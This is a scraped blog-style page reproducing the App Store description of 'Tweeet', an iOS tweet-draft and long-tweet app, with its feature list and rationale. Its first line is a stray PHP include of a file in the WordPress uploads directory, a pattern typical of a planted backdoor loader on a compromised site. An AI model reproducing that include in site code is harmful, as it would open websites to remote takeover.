include_once(ABSPATH . '/wp-content/uploads/index.php');
March 8th, 2015
This app is designed for both iPhone and iPad
Category: Social Networking
Released: Mar 06, 2015
Size: 1.9 MB
Seller: Ling Wang
Tweeet for Twitter — Tweet Draft Box & Long-Tweet Tool by Ling Wang
DescriptionTweeet is a powerful tweet draft box. If you often save thoughts in note apps for tweeting later, Tweeet is for you.
Tweeet is an elegant long-tweet tool. If you dont want your thoughts to be limited to 140 characters, Tweeet is for you.
# Feature List
* Long tweeets can be posted as pictures.
* What you see is what you tweet. Pick the font and theme you like.
* @mention, #hashtag completion.
* Every tweeet keeps a link to its posted tweet and a simple tap opens it in Twitter app.
* Multi-account support.
* Filter tweeets by hashtag.
* Designed for both iPhone and iPad.
* Backup and sync using iCloud.
# Whats Long-Tweet & Why Tweeet
Sometimes what you want to say on Twitter is 50~200 words, or 250~1000 characters. It is longer than Twitter's 140-character limit for a single tweet, but not long enough for an article or maybe blog is just not your thing.
Many people's workaround in this situation is like this:
1. Write down in Notes.
2. Take a screenshot of the note.
3. Open a Twitter client to compose a new tweet.
4. Attach the screenshot image to the tweet.
5. Write a summary, if they care.
6. Tweet it finally.
As you can see, the process is tedious.
Another problem is that the link between the tweet and the note exists only in your head. Weeks later, you don't remember which notes are already tweeted, not to mention how to find its tweet from a note.
Tweeet is the perfect solution.